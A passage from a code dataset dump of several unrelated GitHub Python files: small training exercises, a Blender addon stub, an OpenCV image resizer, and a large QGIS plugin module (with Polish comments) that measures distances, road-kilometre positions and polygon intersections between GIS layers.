isinstance(parameter_dict, dict):\n msg = \"Did not receive a dict as input for parameter_dict\"\n raise ValueError(msg)\n # Use the dict to create a sweep directory\n create_dict_sweep(\n sweep_path=args.sweep_path,\n n_dirs=args.n_dirs,\n destructive=args.destructive,\n copy_dir=args.copy_dir,\n edit_file=args.edit_file,\n parameter_dict=parameter_dict,\n )\n\n elif args.para_to_template != \"\":\n create_dir_tree(\n sweep_path=args.sweep_path,\n n_dirs=args.n_dirs,\n destructive=args.destructive,\n copy_dir=args.copy_dir,\n edit_file=args.edit_file,\n parameter_to_scan=args.para_to_template,\n scan_range=(args.scan_min, args.scan_max),\n outdir_prefix=args.dir_prefix,\n )\n else:\n msg = (\n \"Please either define a parameter_dict or chose a para_to_template\"\n \" for the sweep directory\"\n )\n raise ValueError(msg)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UCL/fabneso","sub_path":"FabNESO/make_sweep_dir.py","file_name":"make_sweep_dir.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39521020403","text":"x = 0 \ny = 0 \nT =\"\"\n\nfor i in range(2000) :\n\tif abs(x) < L-1 and abs(y) < L-1:\n\t\t# The robot has not reached the edge\n\t\tr = randi(1,4)\n\t\tif r==1:\n\t\t\t# Hop North\n\t\t\ty = y + 2; T = T + 'NN' \n\t\telif r==2:\n\t\t\t# Hop East\n\t\t\tx = x + 2; T = T + 'EE' \n\t\telif r==3:\n\t\t\t# Hop South\n\t\t\ty = y-2; T = T + 'SS' \n\t\telse:\n\t\t\t# Hop West\n\t\t\tx = x-2; T = T + 'WW'\n\telse:\n\t\tbreak\n","repo_name":"aayush17002/DumpCode","sub_path":"Dump/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3054374260","text":"bl_info = {\n \"name\": \"Rename Asist\",\n \"author\": \"BlenderBoi\",\n \"version\": (1, 0),\n \"blender\": (3, 1, 0),\n \"description\": \"\",\n \"wiki_url\": \"\",\n \"category\": \"Utility\",\n}\n\nimport bpy\nfrom . import Preferences\nfrom . import Panels\nfrom . import Operator\n\nmodules = [Panels, Preferences, Operator]\n\ndef register():\n\n for module in modules:\n module.register()\n\ndef unregister():\n\n for module in modules:\n module.unregister()\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"BlenderBoi/Rename-Asist","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39202591745","text":"def say_hello(name):\n print(\"Hello \" + name)\n\ndef power(x, y):\n return x ** y\n\n\ndef fib(x):\n if x == 0: return 0\n if x == 1: return 1\n return fib(x - 1) + fib(x - 2)\n\n\narea_codes = {[418,581]:'Québec',\n 'Montréal': [438, 514],\n 'Banlieue': [450]}\n\ndef get_area_codes(region):\n if region in area_codes :\n return area_codes[region]\n return 'Unknown region'\n\ndef get_region(area_code):\n for k,v in area_codes.items():\n if area_code in v: return(k)\n return 'Unknown area code'\n\ndef words_average_size(text):\n size_sum = 0\n words = text.split()\n for word in words :\n size_sum += len(word)\n return size_sum / len(words)\n\ndef divide(x,y):\n try:\n return (x / y)\n except ZeroDivisionError:\n print('! Division par zéro !')\n return float(\"inf\")\n\ndef fizz_buzz():\n result = []\n for x in range(0, 101):\n if (x % 15 == 0):\n result.append(\"FizzBuzz\")\n elif(x % 3 == 0) :\n result.append(\"Fizz\")\n elif(x % 5 == 0):\n result.append(\"Buzz\")\n else:\n result.append(x)\n return result\n\ndef mine_sweeper(size, content):\n \n # Build grid\n grid = {}\n lines, columns = size\n index = 0\n for x in range(0, lines):\n for y in range(0, columns):\n grid[(x,y)] = content[index]\n index += 1\n\n # Compute neighbors\n for coordinates in grid:\n if(grid[coordinates] == \"*\"): continue\n x, y = coordinates\n neighbors = [(x - 1, y + 1), (x, y + 1), (x + 1, y + 1),\n (x - 1, y), (x + 1, y),\n (x - 1, y - 1), (x, y - 1), (x + 1, y - 1)]\n number_of_adjacent_mines = 0\n for neighbor in neighbors:\n if (neighbor in grid) and (grid[neighbor] == \"*\"):\n number_of_adjacent_mines += 1\n grid[coordinates] = number_of_adjacent_mines\n\n #Build display\n display = \"\"\n for x in range(0, lines):\n for y in range(0, columns):\n display += str(grid[(x,y)])\n display += \"\\n\"\n return display\n\n\nif __name__ == \"__main__\":\n say_hello(\"guys\")\n print(power(2, 3))\n print(get_area_codes('Montréal'))\n print(get_area_codes('New York'))\n print(get_region(438))\n print(get_region(123))\n print(words_average_size(\"ha ha\"))\n print(words_average_size(\"hi hello\"))\n print(divide(1,2))\n print(divide(1,0))\n print(fizz_buzz())\n print(mine_sweeper((3,3), \"*.......*\"))\n\n","repo_name":"tlsrc/python-training","sub_path":"module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25449049282","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimg = cv2.imread('pygame/car2.png', cv2.IMREAD_UNCHANGED)\n\nscale_percent = 40 # percent of original size\nwidth = int(img.shape[1] * scale_percent / 100)\nheight = int(img.shape[0] * scale_percent / 100)\ndim = (width, height)\n \n# resize image\nresized = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n\ncv2.imwrite('pygame/newcar2.png', resized)","repo_name":"kopmean/pygame","sub_path":"resize_img.py","file_name":"resize_img.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30237566781","text":"# import os\nimport os.path, math, ntpath, re\nimport processing\n\nfrom qgis.core import (\n QgsGeometry, QgsGeometryCollection,\n QgsPoint,\n QgsPolygon,\n QgsField,\n QgsFields,\n QgsMultiPoint,\n QgsFeature,\n QgsPointXY,\n QgsWkbTypes,\n QgsProject,\n QgsFeatureRequest,\n QgsVectorLayer,\n QgsDistanceArea,\n QgsUnitTypes,\n QgsVectorLayer,\n QgsCoordinateReferenceSystem,\n QgsCoordinateTransform,\n QgsCoordinateTransformContext,\n QgsSpatialIndex,\n QgsProcessing,\n QgsProcessingAlgorithm,\n QgsProcessingContext,\n QgsFeatureIterator,\n QgsProcessingUtils\n\n)\nfrom PyQt5.QtCore import *\n\ndef kmFormat(km):\n km_format = str(math.floor(km/1000)) + '+' + str(int(km%1000)).rjust(3,'0')\n return km_format\n\nclass Layer:\n def __init__(self, layer):\n self.layer = layer\n self.pt = QgsPoint()\n self.prefix = ''\n self.result_paths_and_prefix = []\n\n def getLayer(self):\n return self.layer\n\n # def setAttributes(self):\n def getPath(self):\n print(self.layer.source())\n return self.layer.source()\n\n\n def makeSpatialIndex(self):\n spIndex = QgsSpatialIndex()\n # for feat in km_inst.getFeatures():\n for feat in self.layer.getFeatures():\n spIndex.insertFeature(feat)\n return spIndex\n\n def czyPolygon(self):\n if self.layer.geometryType() == QgsWkbTypes.PolygonGeometry:\n polygon = True\n else:\n polygon = False\n # print(\"wkbtype: \" + str(self.layer.geometryType()))\n return polygon\n\n def makePrefix(self, prefix):\n self.prefix = prefix\n # def transformCRS(self):\n\n # def addResultPath(self, path):\n # self.result_paths.append(path)\n\n def addResultPathAndPrefix(self, path, prefix):\n self.result_paths_and_prefix.append([path, prefix])\n\n def getResultPathsAndPrefix(self):\n return self.result_paths_and_prefix\n\n # def getResultPaths(self):\n # return self.result_paths\n\n def getPrefix(self):\n return self.prefix\n\n def setPrefix(self, prefix):\n self.prefix = prefix\n\n def distansStrona(self, os):\n self.error = 0\n self.layer.startEditing()\n line_feats = [ feat for feat in os.getLayer().getFeatures() ] \n layer_feats = [ feat for feat in self.layer.getFeatures() ]\n for feat in layer_feats:\n if feat.geometry() is not None:\n dist_od_osi = 999999999\n pos = ''\n pt = QgsPoint()\n\n for line_feat in line_feats: #----->zabezpieczyć na wypadek pustej geometrii!!!<------\n if line_feat.geometry() is not None:\n feat_to_point_geom_temp = line_feat.geometry().nearestPoint(feat.geometry()) #najblizszy punkt na osi\n feat_to_point_geom_feature_temp = feat.geometry().nearestPoint(line_feat.geometry()) #najblizszy punkt na obiekcie\n dist_od_osi_temp = QgsGeometry.distance(feat_to_point_geom_temp, feat.geometry())\n if dist_od_osi_temp < dist_od_osi:\n pt = feat_to_point_geom_feature_temp.asPoint()\n\n dist_od_osi = round(dist_od_osi_temp,1)\n\n point_in_line = line_feat.geometry().closestSegmentWithContext(pt)[3] #numer 3 pokazuje która strona, numer 1 daje punkt\n\n if point_in_line > 0:\n pos = 'prawa'\n elif point_in_line < 0:\n pos = 'lewa'\n else:\n pos = 'na osi'\n if line_feat.geometry().crosses(feat.geometry()) or line_feat.geometry().intersects(feat.geometry()):\n pos = 'na osi'\n else:\n self.error = 3 #pusta geometria osi\n else:\n self.error = 4 #pusta geometrai w warstwie przecinanej\n self.pt = pt\n idx_dist_od_osi = self.layer.fields().lookupField('dist_od_osi')\n # print( self.layer.fields().names())\n feat[idx_dist_od_osi] = round(float(dist_od_osi),3)\n\n ###################\n idx_strona = self.layer.fields().lookupField('strona')\n feat[idx_strona] = pos\n\n self.layer.updateFeature( feat )\n #############\n self.layer.commitChanges()\n return self.error\n\n def przeciecia(self, km, os, pas, km_checked, os_checked, pas_checked, kmfield):\n self.layer.startEditing()\n crs92 = \"EPSG:2180\"\n spIndex = km.makeSpatialIndex()\n layer_feats = [ feat for feat in self.layer.getFeatures() ]\n i=0\n for feat in layer_feats:\n # dist_od_osi = 999999999\n if pas_checked:\n obszar_fts = pas.getLayer().getFeatures()\n else:\n obszar_fts = QgsFeatureIterator()\n\n if os_checked:\n os_fts = os.getLayer().getFeatures()\n else:\n os_fts = []\n\n pos_zakres = 'poza zakresem inwestycji'\n\n geoms = QgsGeometry.fromWkt('GEOMETRYCOLLECTION()')\n for feature in os_fts:\n geom = feature.geometry()\n # print(geom)\n geoms = geoms.combine(geom)\n\n dist_to_pas = []\n area = 0\n\n #tworzy nową warstwę na przecięcia\n przeciecia_fts = QgsVectorLayer(QgsWkbTypes.displayString(QgsWkbTypes.Point)+\"?crs=\"+crs92, \"przecięcia\", \"memory\")\n przeciecia_fts.startEditing()\n fieldid = QgsField(\"id\", QVariant.Int)\n fieldids = QgsFields()\n fieldids.append(fieldid)\n przeciecia_fts.addAttribute(fieldid)\n\n intersections_fts = []\n #pętla po obszarach\n if not obszar_fts.isValid():\n feat_ring = feat.geometry().convertToType(1,False) #wybranie granic poligonów inwentaryzacji w celu przecięć\n\n if not feat.geometry().intersection(geoms.buffer(0.01,50)).isEmpty():\n intersections_fts.append(feat.geometry().intersection(geoms.buffer(0.01,50))) #dodanie oryginalnych obiektów do listy z przecięciami jeśli nie analizujemy pasa\n #dodanie oryginalnych obiektów do listy z przecięciami jeśli nie analizujemy pasa\n przeciecia_pts = feat_ring.intersection(geoms.convertToType(5,False)) #uzyskanie punktów przecięcia\n\n if not (przeciecia_pts.isEmpty()):\n points = przeciecia_pts.asMultiPoint() #################### błąd typu osi\n for point in points:\n i+=1\n new_feature = QgsFeature(fieldids)\n new_feature.setGeometry(QgsPoint(point))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n else:\n new_feature = QgsFeature(fieldids)\n if km_checked and os_checked:\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(geoms).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n else:\n if not obszar_ft.geometry().isNull():\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(obszar_ft.geometry().buffer(0.01,50)).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n\n for obszar_ft in obszar_fts:\n if obszar_ft.geometry().buffer(0.01,50).crosses(feat.geometry()) or obszar_ft.geometry().buffer(0.01,50).intersects(feat.geometry()) or obszar_ft.geometry().buffer(0.01,50).contains(feat.geometry()):\n pos_zakres = 'w zakresie inwestycji' #modyfikacja pola pozycja\n dist_to_pas.append(float(QgsGeometry.distance(obszar_ft.geometry().buffer(0.01,50),feat.geometry()))) #dodanie do listy odległości w celu wybrania najmniejszej\n\n if self.czyPolygon():\n feat_ring = feat.geometry().convertToType(1,False) #wybranie granic poligonów inwentaryzacji w celu przecięć\n przeciecia_pts = QgsGeometry() #warstwa z punktami przecięcia\n if pas_checked:\n przeciecia = feat.geometry().intersection(obszar_ft.geometry().buffer(0.01,50))\n area += przeciecia.area() #dodanie do liczby z powierzchni przecięcia danego fragmentu\n obszar_ring = obszar_ft.geometry().buffer(0.01,50).convertToType(1,False)\n\n if not przeciecia.isEmpty():\n intersections_fts.append(przeciecia) #dodanie obiektów do listy z przecięciami\n\n przeciecia_pts = feat_ring.intersection(obszar_ring) #uzyskanie punktów przecięcia\n else:\n intersections_fts.append(feat.geometry().buffer(0.01,50)) #dodanie oryginalnych obiektów do listy z przecięciami jeśli nie analizujemy pasa\n przeciecia_pts = feat_ring.intersection(geoms.geometry().buffer(0.01,50))#.buffer(0.01,50).convertToType(1,False)) #uzyskanie punktów przecięcia\n ############### doddć przecięcia z osią!!!!\n # przeciecia_pts = feat_ring.intersection(os) #uzyskanie punktów przecięcia\n\n if not (przeciecia_pts.isEmpty()):\n points = przeciecia_pts.asMultiPoint()\n for point in points:\n i+=1\n new_feature = QgsFeature(fieldids)\n new_feature.setGeometry(QgsPoint(point))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n else:\n new_feature = QgsFeature(fieldids)\n if km_checked and os_checked:\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(geoms).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n else:\n if not obszar_ft.geometry().isNull():\n new_feature.setGeometry(QgsPoint(feat.geometry().nearestPoint(obszar_ft.geometry().buffer(0.01,50)).asPoint()))\n new_feature.setAttribute(0,i)\n przeciecia_fts.addFeature(new_feature)\n\n\n\n przeciecia_fts.commitChanges()\n\n przeciecia_km = [[0]]\n przeciecia_km[0].clear()\n przeciecie_km_str = ''\n\n #print(intersections_fts)\n\n if self.czyPolygon():\n idx_powierzchnia = self.layer.fields().lookupField('powierzchnia')\n feat[idx_powierzchnia] = round(feat.geometry().area(),3)\n if pas_checked:\n idx_powierzchnia_przec = self.layer.fields().lookupField('pow_prze')\n feat[idx_powierzchnia_przec] = round(area,3)\n idx_procent = self.layer.fields().lookupField('procent')\n feat[idx_procent] = round(area*100/feat.geometry().area(),2)\n if km_checked and os_checked:\n if len(intersections_fts)>0:\n liczba_obszarow = 0\n for intersection in intersections_fts:\n if intersection.isMultipart()==True:\n # print('multi')\n for intersection_geom in intersection.asGeometryCollection():\n\n km_przeciec_obszaru = []\n for intersection_geom_pt in intersection_geom.asPolygon()[0]:\n nearestIds = spIndex.nearestNeighbor(intersection_geom_pt,1)\n km_przeciec_obszaru.append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n przeciecia_km.append([])\n przeciecia_km[liczba_obszarow].append(min(km_przeciec_obszaru))\n przeciecia_km[liczba_obszarow].append(max(km_przeciec_obszaru))\n\n #print(min(km_przeciec_obszaru))\n #print(max(km_przeciec_obszaru))\n\n for przeciecia_ft in przeciecia_fts.getFeatures():\n if intersection_geom.contains(przeciecia_ft.geometry()) or intersection_geom.intersects(przeciecia_ft.geometry()):\n nearestIds = spIndex.nearestNeighbor(przeciecia_ft.geometry(),1)\n przeciecia_km.append([])\n przeciecia_km[liczba_obszarow].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n liczba_obszarow +=1\n else:\n # print('single')\n for przeciecia_ft in przeciecia_fts.getFeatures():\n if intersection.contains(przeciecia_ft.geometry()) or intersection.intersects(przeciecia_ft.geometry()):\n # print('zawiera')\n nearestIds = spIndex.nearestNeighbor(przeciecia_ft.geometry(),1)\n przeciecia_km[liczba_obszarow].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n km_przeciec_obszaru = []\n\n for intersection_pt in intersection.asPolygon()[0]:\n\n nearestIds = spIndex.nearestNeighbor(intersection_pt,1)\n km_przeciec_obszaru.append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n przeciecia_km[liczba_obszarow].append(min(km_przeciec_obszaru))\n przeciecia_km[liczba_obszarow].append(max(km_przeciec_obszaru))\n\n else:\n\n for przeciecia_ft in przeciecia_fts.getFeatures():\n nearestIds = spIndex.nearestNeighbor(przeciecia_ft.geometry(),1)\n # przeciecia_km.append([])\n przeciecia_km[0].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n # pt = feat.geometry().nearestPoint(obszar_ft.geometry())#.asPoint()\n # nearestIds = spIndex.nearestNeighbor(pt,1)#QgsGeometry.fromPointXY(pt),1)\n # przeciecia_km[0].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n else:\n if km_checked and os_checked:\n nearestIds = spIndex.nearestNeighbor(feat.geometry(),1)\n przeciecia_km[0].append(km.getLayer().getFeature(nearestIds[0]).attributes()[kmfield])\n\n\n\n if km_checked and os_checked:\n i=1\n idx_km = self.layer.fields().lookupField('km')\n\n for przeciecie_km in przeciecia_km:\n if len(przeciecie_km)>0:\n przec_min = float(min(przeciecie_km))\n przec_max = float(max(przeciecie_km))\n przeciecie_km_str+= kmFormat(przec_min)\n if przec_min != przec_max:\n przeciecie_km_str+= ' - '\n przeciecie_km_str+= kmFormat(przec_max)\n elif len(przeciecia_km) == 1 and self.layer.fields().field(idx_km).type() != QVariant.String:\n przeciecie_km_str = przec_min\n if len(przeciecia_km) != i: przeciecie_km_str+= ', '\n i+=1\n \n # print(idx_km)\n # print(przeciecie_km_str)\n feat[idx_km] = str(przeciecie_km_str)\n\n if pas_checked:\n idx_czy_przecina = self.layer.fields().lookupField('czy_przecina')\n idx_dist_od_pasa = self.layer.fields().lookupField('dist_od_pasa')\n # print(idx_czy_przecina)\n # print(pos_zakres)\n feat[idx_czy_przecina] = pos_zakres\n feat[idx_dist_od_pasa] = min(dist_to_pas)\n\n self.layer.updateFeature( feat )\n #############\n self.layer.commitChanges()\n\nclass LoadOuterLayers:\n def __init__(self):\n self.dsu = QgsDataSourceURI()\n pass\n # self.layers = []\n # self.licznik_warstw = 0\n # self.new_layers = []\n # self.sp_indexes = []\n # self.prefix = []\n\n def loadWFS(self):\n dsu = QgsDataSourceURI()\n dsu.setParam( 'url', 'http://wms.pcn.minambiente.it/ogc?map=/ms_ogc/wfs/Carta_geologica.map' )\n dsu.setParam( 'version', '1.1.0' )\n dsu.setParam( 'typename', 'GE.CARTAGEOLOGICA' )\n dsu.setParam( 'InvertAxisOrientation', '1' )\n layer = QgsVectorLayer( dsu.uri(), \"my wfs layer\", \"WFS\" )\n\n res = QgsVectorFileWriter.writeAsVectorFormat( layer,\n '/tmp/wfs_features.shp',\n 'System', # encoding\n None, #crs\n 'ESRI Shapefile')\n\n if res != QgsVectorFileWriter.NoError:\n print ('Error number:' + res)\n else:\n print (\"WFS saved!\")\n\n\nclass LoadLayers:\n def __init__(self):\n self.layers = []\n self.licznik_warstw = 0\n self.new_layers = []\n self.sp_indexes = []\n self.prefix = []\n self.context = QgsProcessingContext()\n\n def checkLayerValidity(self):\n wynik = 0\n layers_out = []\n for layer_klasa in self.layers:\n layer = layer_klasa.getLayer()\n print(layer)\n if layer is not None and layer.featureCount()>0 and layer.isValid() and layer.isSpatial():\n #przebiegnij po rekordach i zobaczy czy nie ma pustej geometrii, jeśli tak to błąd\n for ft in layer.getFeatures():\n if ft.geometry().isNull():\n wynik = 1\n self.licznik_warstw+=1\n layers_out.append(Layer(layer))\n # jeśli nie znaleziono żadnej poprawnej warstwy, wyświetl komunikat i koniec\n if self.licznik_warstw==0:\n wynik = 2\n return wynik\n\n def getLayers(self):\n return self.layers\n\n def getLayersByPrefix(self, prefix):\n layer_by_prefix = None\n for layer_klasa in self.new_layers:\n\n if layer_klasa.getPrefix() == prefix:\n layer_by_prefix = layer_klasa\n return layer_by_prefix\n\n def getNewLayers(self):\n return self.new_layers\n\n def getPrefixes(self):\n return self.prefix\n\n def newLayers(self):\n return self.new_layers\n\n def loadLayer(self, layer, prefix):\n outputs = {}\n \n # Napraw geometrie\n print('layer: '+str(layer.source()))\n alg_params = {\n 'INPUT': layer.source(),\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['NaprawGeometrie'] = processing.run('native:fixgeometries', alg_params, context=self.context, is_child_algorithm=True)\n \n layer_napr = QgsProcessingUtils.mapLayerFromString(outputs['NaprawGeometrie']['OUTPUT'], self.context) \n layer_napr.setName(layer.name())\n\n layer_save = Layer(layer_napr)\n layer_save.makePrefix(prefix)\n self.layers.append(layer_save)\n self.prefix.append(prefix)\n \n def loadLayersFromStringList(self, layersStringList):\n self.layers = []\n for laer_orygin_str in layersStringList: #weź listę plików\n\n outputs = {}\n # Napraw geometrie\n alg_params = {\n 'INPUT': laer_orygin_str,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n } \n outputs['NaprawGeometrie'] = processing.run('native:fixgeometries', alg_params, context=self.context, is_child_algorithm=True)\n\n #laer_orygin_str_napr = outputs['NaprawGeometrie']['OUTPUT']\n\n filename = ntpath.basename(laer_orygin_str) #wyodrębnij nazwę pliku z warstwą\n #layer = QgsVectorLayer(laer_orygin_str_napr, filename, \"ogr\") #twórz warstwę\n\n layer = QgsProcessingUtils.mapLayerFromString(outputs['NaprawGeometrie']['OUTPUT'], self.context)\n layer.setName(filename)\n\n prefix = re.findall('\\A[a-zA-Z0-9]+_', filename)[0] if len(re.findall('\\A[a-zA-Z0-9]+_', filename))>0 else '_'\n layer_save = Layer(layer)\n layer_save.makePrefix(prefix)\n self.layers.append(layer_save)\n self.prefix.append(prefix)\n\n\n def makeNewLayers(self):\n self.new_layers = []\n crs92 = \"EPSG:2180\"\n for layer_orygin_klasa in self.layers:\n layer_orygin = layer_orygin_klasa.getLayer()\n #twórz nową warstwę do której będzie kopiować obiekty dla każdej z warstw\n layer = QgsVectorLayer(QgsWkbTypes.displayString(layer_orygin.wkbType())+\"?crs=\"+crs92, layer_orygin.name(), \"memory\")\n\n attr = layer_orygin.dataProvider().fields().toList()\n layer.setProviderEncoding('UTF-8')\n layer.dataProvider().addAttributes(attr)\n\n layer.updateFields()\n\n #przygotuj transformację\n crs_system = layer_orygin.sourceCrs() #QgsCoordinateReferenceSystem(crs)\n crs_system92 = QgsCoordinateReferenceSystem(crs92)\n xform = QgsCoordinateTransform(crs_system, crs_system92, QgsProject.instance())\n #CRS transformation\n feats = []\n\n for f in layer_orygin.getFeatures():\n g = f.geometry()\n g.transform(xform)\n f.setGeometry(g)\n feats.append(f)\n # dodaj przetransformowane do układu 92 obiekty do warstwy w układzie 92\n layer.dataProvider().addFeatures(feats)\n\n layer_save = Layer(layer)\n layer_save.setPrefix(layer_orygin_klasa.getPrefix())\n self.new_layers.append(layer_save)\n\n def addFields(self, km_checked, os_checked, pas_checked):\n #czy poligon-------------\n for layer_klasa in self.new_layers:\n\n layer = layer_klasa.getLayer()\n # layer_orygin\n polygon = layer_klasa.czyPolygon()\n #dodaje atrybuty ze źródłowej warstwy\n attr = layer.dataProvider().fields().toList()\n # layer.dataProvider().addAttributes(attr)\n # layer.updateFields()\n\n field_names = layer.fields().names()\n field_names = [each_string.lower() for each_string in field_names]\n\n layer.startEditing() #zaczynam edycję warstwy\n\n #dodaję pola jeśli nie ma w warstwie\n if 'id' not in field_names:\n field = QgsField( 'id', QVariant.String )\n layer.addAttribute( field )\n idx_id = layer.fields().lookupField('id') #pobierz id koolumny żeby później uzupełnić\n\n if ('strona' not in field_names) and (km_checked and os_checked):\n \tfield = QgsField( 'strona', QVariant.String )\n \tlayer.addAttribute( field )\n idx_strona = layer.fields().lookupField('strona') #pobierz id koolumny żeby później uzupełnić\n\n if ('km' not in field_names) and (km_checked and os_checked):\n \tfield = QgsField( 'km', QVariant.String )\n \tlayer.addAttribute( field )\n idx_km = layer.fields().lookupField('km')\n\n if ('dist_od_osi' not in field_names) and (km_checked and os_checked):\n \tfield = QgsField( 'dist_od_osi', QVariant.String )\n \tlayer.addAttribute( field )\n idx_dist_od_osi = layer.fields().lookupField('dist_od_osi')\n\n if ('dist_od_pasa' not in field_names) and pas_checked:\n \tfield = QgsField( 'dist_od_pasa', QVariant.String )\n \tlayer.addAttribute( field )\n idx_dist_od_pasa = layer.fields().lookupField('dist_od_pasa')\n\n if ('czy_przecina' not in field_names) and pas_checked:\n \tfield = QgsField( 'czy_przecina', QVariant.String )\n \tlayer.addAttribute( field )\n idx_czy_przecina = layer.fields().lookupField('czy_przecina')\n\n #pola jedynie dla poligonów\n if polygon == True:\n if ('powierzchnia' not in field_names):\n \tfield = QgsField( 'powierzchnia', QVariant.Double )\n \tlayer.addAttribute( field )\n powierzchnia = layer.fields().lookupField('powierzchnia')\n\n if ('pow_prze' not in field_names) and pas_checked:\n \tfield = QgsField( 'pow_prze', QVariant.Double )\n \tlayer.addAttribute( field )\n powierzchnia_przec = layer.fields().lookupField('pow_prze')\n\n if ('procent' not in field_names) and pas_checked:\n \tfield = QgsField( 'procent', QVariant.Double )\n \tlayer.addAttribute( field )\n procent = layer.fields().lookupField('procent')\n\n id2=0\n for f in layer.getFeatures():\n id2+=1\n f[idx_id] = str(id2)\n layer.updateFeature( f )\n layer.commitChanges()\n\n\n\nclass ZlaczWarianty:\n def __init__(self, paths_and_prefix):\n self.prefix = []\n self.paths = []\n # self_warstwyzlaczone = []\n for pex in paths_and_prefix:\n self.prefix.append(pex[1])\n self.paths.append(pex[0])\n\n # print(self.prefix)\n # print(self.paths)\n\n self.output_path = QgsProcessing.TEMPORARY_OUTPUT\n\n self.results = {}\n self.outputs = {}\n\n\n def mergeLayers(self, output):\n path1 = None\n path2 = None\n # print(path1)\n # print(path2)\n i = 0\n context = QgsProcessingContext()\n for path in self.paths:\n i+=1\n # print(i)\n if i == len(self.paths):\n self.output_path = output\n if path1 is not None and path2 is not None:\n path2 = path\n path1 = self.outputs['ZczAtrybutyWedugWartociPola']['OUTPUT']\n if path2 is None and path1 is not None:\n path2 = path\n if path1 is None:\n path1 = path\n\n input1 = None\n if path1 is not None and path2 is not None:\n if i<3:\n wariant_fieldname = str(i-1) + ''+ 'wariant'\n\n # Kalkulator pól\n alg_params = {\n 'FIELD_LENGTH': 200,\n 'FIELD_NAME': wariant_fieldname,\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 2, # tekst\n 'FORMULA': \"'\" + self.prefix[i-2].replace('_','') + \"'\",\n 'INPUT': path1,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n self.outputs['KalkulatorPl1'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n input1 = self.outputs['KalkulatorPl1']['OUTPUT']\n\n else:\n input1 = self.outputs['ZczAtrybutyWedugWartociPola']['OUTPUT']\n\n # Kalkulator pól\n\n\n alg_params = {\n 'FIELD_LENGTH': 200,\n 'FIELD_NAME': wariant_fieldname,\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 2, # tekst\n 'FORMULA': \"'\" + self.prefix[i-1].replace('_','') + \"'\",\n 'INPUT': path2,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n self.outputs['KalkulatorPl2'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n\n alg_params = {\n 'DISCARD_NONMATCHING': False,\n 'FIELD': 'id',\n 'FIELDS_TO_COPY': ['strona', 'km', 'dist_od_os', 'dist_od_pa', 'czy_przeci','powierzchn', 'pow_prze', 'procent', wariant_fieldname],\n 'FIELD_2': 'id',\n 'INPUT': input1,\n 'INPUT_2': self.outputs['KalkulatorPl2']['OUTPUT'],\n 'METHOD': 1, # przyjmuj atrybuty tylko z pierwszego pasującego obiektu (jeden do jednego)\n 'PREFIX': i,\n 'OUTPUT': self.output_path\n }\n # print( self.output_path)\n self.outputs['ZczAtrybutyWedugWartociPola'] = processing.run('native:joinattributestable', alg_params, context=context, is_child_algorithm=True)\n\n self.results['Wynik'] = self.outputs['ZczAtrybutyWedugWartociPola']['OUTPUT']\n\n return self.results['Wynik']\n\nclass ObrobkaWarstw:\n def __init__(self):\n self.prefix = []\n self.paths = []\n #self.conte\n\n def dodaj_atrybut_z_warstwy(self, layer_info, fieldname, layerpath, context = QgsProcessingContext()):\n # Kalkulator pól\n outputs = {}\n\n # Przelicz układ współrzędnych warstwy\n alg_params = {\n 'INPUT': layer_info,\n 'OPERATION': '',\n 'TARGET_CRS': QgsCoordinateReferenceSystem('EPSG:2180'),\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n outputs['PrzeliczUkadWsprzdnychWarstwy'] = processing.runAndLoadResults('native:reprojectlayer', alg_params, context=context)\n\n alg_params = {\n 'FIELD_LENGTH': 255,\n 'FIELD_NAME': 'pole_dod',\n 'FIELD_PRECISION': 0,\n 'FIELD_TYPE': 2, # tekst\n 'FORMULA': ''' overlay_nearest( layer:=\\'{lay}\\', expression:=\\\"{fieldname}\\\")[0]'''.format(lay = outputs['PrzeliczUkadWsprzdnychWarstwy']['OUTPUT'], fieldname = fieldname),\n 'INPUT': layerpath,\n 'OUTPUT': QgsProcessing.TEMPORARY_OUTPUT\n }\n print(alg_params['FORMULA'])\n outputs['KalkulatorPl'] = processing.run('native:fieldcalculator', alg_params, context=context, is_child_algorithm=True)\n return [context, 